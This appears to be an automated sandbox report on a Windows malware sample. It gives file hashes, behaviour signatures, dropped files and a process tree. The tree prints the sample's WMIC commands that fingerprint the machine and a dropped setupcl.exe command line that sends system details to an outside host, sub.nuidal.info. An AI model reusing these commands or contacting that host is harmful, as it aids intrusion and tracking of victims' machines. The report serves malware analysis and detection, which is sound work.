6b10f83cd3327749cd69481df7a9d5f08fc81204a67ae8f6865c658623a7165c

Analysis

max time kernel
149s
max time network
162s
platform
windows10-2004_x64
resource
win10v2004-20221111-en
resource tags

arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
submitted
26/11/2022, 22:25

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

6b10f83cd3327749cd69481df7a9d5f08fc81204a67ae8f6865c658623a7165c.exe
Size

280KB
MD5

3bb5a24d45b029ada9d423eb6d8e8caa
SHA1

0f33f0e7595ca302ba8bf94c220b3013f5f3e894
SHA256

6b10f83cd3327749cd69481df7a9d5f08fc81204a67ae8f6865c658623a7165c
SHA512

7c08ce6bc14aa2a68b2d94e3530f57b576195812eb3ffb5d6b105f6ea443c4ef1eb4fc9ee7d630b0cfbac14db11f1b08d1259de933e5ea9e470380a4ede898c1
SSDEEP

6144:gso3mypIkejMVzTnrCqqWKbD/6HtK9rK1xJ5CN/LAu8Z:A33pIRjGTn3qWKPdkx3A+

Score

8^/10

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
3408	UnRar.exe
1808	setupcl.exe

Loads dropped DLL 5 IoCs

pid	Process
4316	6b10f83cd3327749cd69481df7a9d5f08fc81204a67ae8f6865c658623a7165c.exe
4316	6b10f83cd3327749cd69481df7a9d5f08fc81204a67ae8f6865c658623a7165c.exe
4316	6b10f83cd3327749cd69481df7a9d5f08fc81204a67ae8f6865c658623a7165c.exe
4316	6b10f83cd3327749cd69481df7a9d5f08fc81204a67ae8f6865c658623a7165c.exe
4316	6b10f83cd3327749cd69481df7a9d5f08fc81204a67ae8f6865c658623a7165c.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	4272	WMIC.exe
Token: SeSecurityPrivilege	4272	WMIC.exe
Token: SeTakeOwnershipPrivilege	4272	WMIC.exe
Token: SeLoadDriverPrivilege	4272	WMIC.exe
Token: SeSystemProfilePrivilege	4272	WMIC.exe
Token: SeSystemtimePrivilege	4272	WMIC.exe
Token: SeProfSingleProcessPrivilege	4272	WMIC.exe
Token: SeIncBasePriorityPrivilege	4272	WMIC.exe
Token: SeCreatePagefilePrivilege	4272	WMIC.exe
Token: SeBackupPrivilege	4272	WMIC.exe
Token: SeRestorePrivilege	4272	WMIC.exe
Token: SeShutdownPrivilege	4272	WMIC.exe
Token: SeDebugPrivilege	4272	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4272	WMIC.exe
Token: SeRemoteShutdownPrivilege	4272	WMIC.exe
Token: SeUndockPrivilege	4272	WMIC.exe
Token: SeManageVolumePrivilege	4272	WMIC.exe
Token: 33	4272	WMIC.exe
Token: 34	4272	WMIC.exe
Token: 35	4272	WMIC.exe
Token: 36	4272	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4272	WMIC.exe
Token: SeSecurityPrivilege	4272	WMIC.exe
Token: SeTakeOwnershipPrivilege	4272	WMIC.exe
Token: SeLoadDriverPrivilege	4272	WMIC.exe
Token: SeSystemProfilePrivilege	4272	WMIC.exe
Token: SeSystemtimePrivilege	4272	WMIC.exe
Token: SeProfSingleProcessPrivilege	4272	WMIC.exe
Token: SeIncBasePriorityPrivilege	4272	WMIC.exe
Token: SeCreatePagefilePrivilege	4272	WMIC.exe
Token: SeBackupPrivilege	4272	WMIC.exe
Token: SeRestorePrivilege	4272	WMIC.exe
Token: SeShutdownPrivilege	4272	WMIC.exe
Token: SeDebugPrivilege	4272	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4272	WMIC.exe
Token: SeRemoteShutdownPrivilege	4272	WMIC.exe
Token: SeUndockPrivilege	4272	WMIC.exe
Token: SeManageVolumePrivilege	4272	WMIC.exe
Token: 33	4272	WMIC.exe
Token: 34	4272	WMIC.exe
Token: 35	4272	WMIC.exe
Token: 36	4272	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4536	WMIC.exe
Token: SeSecurityPrivilege	4536	WMIC.exe
Token: SeTakeOwnershipPrivilege	4536	WMIC.exe
Token: SeLoadDriverPrivilege	4536	WMIC.exe
Token: SeSystemProfilePrivilege	4536	WMIC.exe
Token: SeSystemtimePrivilege	4536	WMIC.exe
Token: SeProfSingleProcessPrivilege	4536	WMIC.exe
Token: SeIncBasePriorityPrivilege	4536	WMIC.exe
Token: SeCreatePagefilePrivilege	4536	WMIC.exe
Token: SeBackupPrivilege	4536	WMIC.exe
Token: SeRestorePrivilege	4536	WMIC.exe
Token: SeShutdownPrivilege	4536	WMIC.exe
Token: SeDebugPrivilege	4536	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4536	WMIC.exe
Token: SeRemoteShutdownPrivilege	4536	WMIC.exe
Token: SeUndockPrivilege	4536	WMIC.exe
Token: SeManageVolumePrivilege	4536	WMIC.exe
Token: 33	4536	WMIC.exe
Token: 34	4536	WMIC.exe
Token: 35	4536	WMIC.exe
Token: 36	4536	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4536	WMIC.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
1808	setupcl.exe
1808	setupcl.exe

Suspicious use of WriteProcessMemory 21 IoCs

description	pid	Process	procid_target
PID 4316 wrote to memory of 4272	4316	6b10f83cd3327749cd69481df7a9d5f08fc81204a67ae8f6865c658623a7165c.exe	83
PID 4316 wrote to memory of 4272	4316	6b10f83cd3327749cd69481df7a9d5f08fc81204a67ae8f6865c658623a7165c.exe	83
PID 4316 wrote to memory of 4272	4316	6b10f83cd3327749cd69481df7a9d5f08fc81204a67ae8f6865c658623a7165c.exe	83
PID 4316 wrote to memory of 4536	4316	6b10f83cd3327749cd69481df7a9d5f08fc81204a67ae8f6865c658623a7165c.exe	87
PID 4316 wrote to memory of 4536	4316	6b10f83cd3327749cd69481df7a9d5f08fc81204a67ae8f6865c658623a7165c.exe	87
PID 4316 wrote to memory of 4536	4316	6b10f83cd3327749cd69481df7a9d5f08fc81204a67ae8f6865c658623a7165c.exe	87
PID 4316 wrote to memory of 3756	4316	6b10f83cd3327749cd69481df7a9d5f08fc81204a67ae8f6865c658623a7165c.exe	89
PID 4316 wrote to memory of 3756	4316	6b10f83cd3327749cd69481df7a9d5f08fc81204a67ae8f6865c658623a7165c.exe	89
PID 4316 wrote to memory of 3756	4316	6b10f83cd3327749cd69481df7a9d5f08fc81204a67ae8f6865c658623a7165c.exe	89
PID 4316 wrote to memory of 2192	4316	6b10f83cd3327749cd69481df7a9d5f08fc81204a67ae8f6865c658623a7165c.exe	91
PID 4316 wrote to memory of 2192	4316	6b10f83cd3327749cd69481df7a9d5f08fc81204a67ae8f6865c658623a7165c.exe	91
PID 4316 wrote to memory of 2192	4316	6b10f83cd3327749cd69481df7a9d5f08fc81204a67ae8f6865c658623a7165c.exe	91
PID 4316 wrote to memory of 3408	4316	6b10f83cd3327749cd69481df7a9d5f08fc81204a67ae8f6865c658623a7165c.exe	93
PID 4316 wrote to memory of 3408	4316	6b10f83cd3327749cd69481df7a9d5f08fc81204a67ae8f6865c658623a7165c.exe	93
PID 4316 wrote to memory of 3408	4316	6b10f83cd3327749cd69481df7a9d5f08fc81204a67ae8f6865c658623a7165c.exe	93
PID 4316 wrote to memory of 1808	4316	6b10f83cd3327749cd69481df7a9d5f08fc81204a67ae8f6865c658623a7165c.exe	95
PID 4316 wrote to memory of 1808	4316	6b10f83cd3327749cd69481df7a9d5f08fc81204a67ae8f6865c658623a7165c.exe	95
PID 4316 wrote to memory of 1808	4316	6b10f83cd3327749cd69481df7a9d5f08fc81204a67ae8f6865c658623a7165c.exe	95
PID 1808 wrote to memory of 4640	1808	setupcl.exe	98
PID 1808 wrote to memory of 4640	1808	setupcl.exe	98
PID 1808 wrote to memory of 4640	1808	setupcl.exe	98

C:\Users\Admin\AppData\Local\Temp\6b10f83cd3327749cd69481df7a9d5f08fc81204a67ae8f6865c658623a7165c.exe
"C:\Users\Admin\AppData\Local\Temp\6b10f83cd3327749cd69481df7a9d5f08fc81204a67ae8f6865c658623a7165c.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4316
- C:\Windows\SysWOW64\Wbem\WMIC.exe
  WMIC csproduct Get UUID /FORMAT:textvaluelist.xsl
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4272
- C:\Windows\SysWOW64\Wbem\WMIC.exe
  WMIC bios Get SerialNumber /FORMAT:textvaluelist.xsl
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4536
- C:\Windows\SysWOW64\Wbem\WMIC.exe
  WMIC bios Get Version /FORMAT:textvaluelist.xsl
  2⤵
  PID:3756
- C:\Windows\SysWOW64\Wbem\WMIC.exe
  WMIC csproduct Get Name /FORMAT:textvaluelist.xsl
  2⤵
  PID:2192
- C:\Users\Admin\AppData\Local\Temp\nsz4D4.tmp\UnRar.exe
  UnRar.exe e -hp2014/03/22-14:03:26 [RANDOM_STRING].rar
  2⤵
  - Executes dropped EXE
  PID:3408
- C:\Users\Admin\AppData\Local\Temp\nsz4D4.tmp\setupcl.exe
  "C:\Users\Admin\AppData\Local\Temp\nsz4D4.tmp\setupcl.exe" /initurl http://sub.nuidal.info/init/6b10f83cd3327749cd69481df7a9d5f08fc81204a67ae8f6865c658623a7165c/:uid:? /affid "-" /id "0" /name " " /uniqid 6b10f83cd3327749cd69481df7a9d5f08fc81204a67ae8f6865c658623a7165c /uuid 00000000-0000-0000-0000-000000000000 /biosserial /biosversion ROCKS - 1 /csname Standard PC (Q35 + ICH9, 2009)
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:1808
- - C:\Windows\SysWOW64\Wbem\wmic.exe
    wmic bios get serialnumber, version
    3⤵
    PID:4640

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\nsz4D4.tmp\UnRAR.exe

Filesize
302KB

MD5
d76c614a5810fdfaa611ee673c6737ed

SHA1
e1b49180eab5fac73ef8bd0af5c247534d2da414

SHA256
a6c0103ab6e07349c43b46ee1da62a0d74d40288427d23fd44faba75f5e275bf

SHA512
d0fc75ef754894e8704d090ed450c1e3f7513521abcc66d2b3e1cb126af00f4b25d24af2beb0595c6911a7dba53a51d0e4c271e34860e6902db84ebb61d4eaed

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsz4D4.tmp\UnRar.exe

Filesize
302KB

MD5
d76c614a5810fdfaa611ee673c6737ed

SHA1
e1b49180eab5fac73ef8bd0af5c247534d2da414

SHA256
a6c0103ab6e07349c43b46ee1da62a0d74d40288427d23fd44faba75f5e275bf

SHA512
d0fc75ef754894e8704d090ed450c1e3f7513521abcc66d2b3e1cb126af00f4b25d24af2beb0595c6911a7dba53a51d0e4c271e34860e6902db84ebb61d4eaed

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsz4D4.tmp\[RANDOM_STRING].rar

Filesize
85KB

MD5
dc61967a31f7bbe14c007d1f7edc8f81

SHA1
984a0338c18157f2efda2bff21c67d837b4c91c0

SHA256
b95bb8ecb5f5757886d4d7e3f3d44f9ad1478162f1070bf8372d725df730dd0f

SHA512
42f2afa842afe1c70ee27272f6e80e84a0d9466032eaafb67b77c32d79d08f8917302f531e501e137565a267b91eba0c5c6074b8648e0dac7f45bcbb96c3eee6

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsz4D4.tmp\lq6eu80drbymikjcz

Filesize
8B

MD5
fd03887411dfd900c39337951e679b04

SHA1
42152a98048ce7705b7d41468fea303c30b7c28a

SHA256
526c508ecdc95803a98d14016d7299a88daa8b026096dc09e4f5692f5a794fd0

SHA512
69ed482297e2c3c0866e1292c2615de587b449559eb1fc3c2f0f30c65ed9a19c34018450d345ce0cd28feec6a5b26d1d4d4d1069f0f93fdedb396c7e5d62d3c7

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsz4D4.tmp\nsExec.dll

Filesize
6KB

MD5
acc2b699edfea5bf5aae45aba3a41e96

SHA1
d2accf4d494e43ceb2cff69abe4dd17147d29cc2

SHA256
168a974eaa3f588d759db3f47c1a9fdc3494ba1fa1a73a84e5e3b2a4d58abd7e

SHA512
e29ea10ada98c71a18273b04f44f385b120d4e8473e441ce5748cfa44a23648814f2656f429b85440157988c88de776c6ac008dc38bf09cbb746c230a46c69fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsz4D4.tmp\nsExec.dll

Filesize
6KB

MD5
acc2b699edfea5bf5aae45aba3a41e96

SHA1
d2accf4d494e43ceb2cff69abe4dd17147d29cc2

SHA256
168a974eaa3f588d759db3f47c1a9fdc3494ba1fa1a73a84e5e3b2a4d58abd7e

SHA512
e29ea10ada98c71a18273b04f44f385b120d4e8473e441ce5748cfa44a23648814f2656f429b85440157988c88de776c6ac008dc38bf09cbb746c230a46c69fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsz4D4.tmp\nsExec.dll

Filesize
6KB

MD5
acc2b699edfea5bf5aae45aba3a41e96

SHA1
d2accf4d494e43ceb2cff69abe4dd17147d29cc2

SHA256
168a974eaa3f588d759db3f47c1a9fdc3494ba1fa1a73a84e5e3b2a4d58abd7e

SHA512
e29ea10ada98c71a18273b04f44f385b120d4e8473e441ce5748cfa44a23648814f2656f429b85440157988c88de776c6ac008dc38bf09cbb746c230a46c69fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsz4D4.tmp\nsExec.dll

Filesize
6KB

MD5
acc2b699edfea5bf5aae45aba3a41e96

SHA1
d2accf4d494e43ceb2cff69abe4dd17147d29cc2

SHA256
168a974eaa3f588d759db3f47c1a9fdc3494ba1fa1a73a84e5e3b2a4d58abd7e

SHA512
e29ea10ada98c71a18273b04f44f385b120d4e8473e441ce5748cfa44a23648814f2656f429b85440157988c88de776c6ac008dc38bf09cbb746c230a46c69fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsz4D4.tmp\nsExec.dll

Filesize
6KB

MD5
acc2b699edfea5bf5aae45aba3a41e96

SHA1
d2accf4d494e43ceb2cff69abe4dd17147d29cc2

SHA256
168a974eaa3f588d759db3f47c1a9fdc3494ba1fa1a73a84e5e3b2a4d58abd7e

SHA512
e29ea10ada98c71a18273b04f44f385b120d4e8473e441ce5748cfa44a23648814f2656f429b85440157988c88de776c6ac008dc38bf09cbb746c230a46c69fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsz4D4.tmp\setupcl.exe

Filesize
193KB

MD5
3417dd6b899f329136c955308b38e6d6

SHA1
1a1533dfc855c16bdcbfa03187d816818612b7ab

SHA256
f0ad091ca3a20bc9d90e1526f40d98ed86243d6c59e5af2c31301bc419732659

SHA512
82e0a51bc9f1914afd650b038742b5876e542d5a571b3aa26849c454148b8b1061218a4b0e718006c07e8ca87b37ca5ece3b52f2789d8304de08a122da5863ba

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsz4D4.tmp\setupcl.exe

Filesize
193KB

MD5
3417dd6b899f329136c955308b38e6d6

SHA1
1a1533dfc855c16bdcbfa03187d816818612b7ab

SHA256
f0ad091ca3a20bc9d90e1526f40d98ed86243d6c59e5af2c31301bc419732659

SHA512
82e0a51bc9f1914afd650b038742b5876e542d5a571b3aa26849c454148b8b1061218a4b0e718006c07e8ca87b37ca5ece3b52f2789d8304de08a122da5863ba

Download Submit